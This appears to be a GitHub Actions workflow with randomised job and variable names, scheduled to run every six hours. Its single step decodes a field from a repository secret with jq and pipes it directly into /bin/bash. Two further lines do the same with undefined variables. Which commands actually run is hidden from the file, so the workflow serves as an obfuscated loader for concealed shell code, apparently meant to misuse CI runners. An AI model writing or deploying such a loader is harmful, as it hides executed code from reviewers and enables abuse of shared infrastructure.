name: maleiteng7813
on:
  workflow_dispatch:
  schedule:
    - cron: '21 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: maleiteng7813
        env:
          zmcni12631: ${{ secrets.zmcni12631 }}
        run: |
          echo $zmcni12631 | jq -r .ncu572 | /bin/bash
          echo $advmc723 | jq -r .uulva444 | /bin/bash
          echo $rz22346 | jq -r .xqr20 | /bin/bash

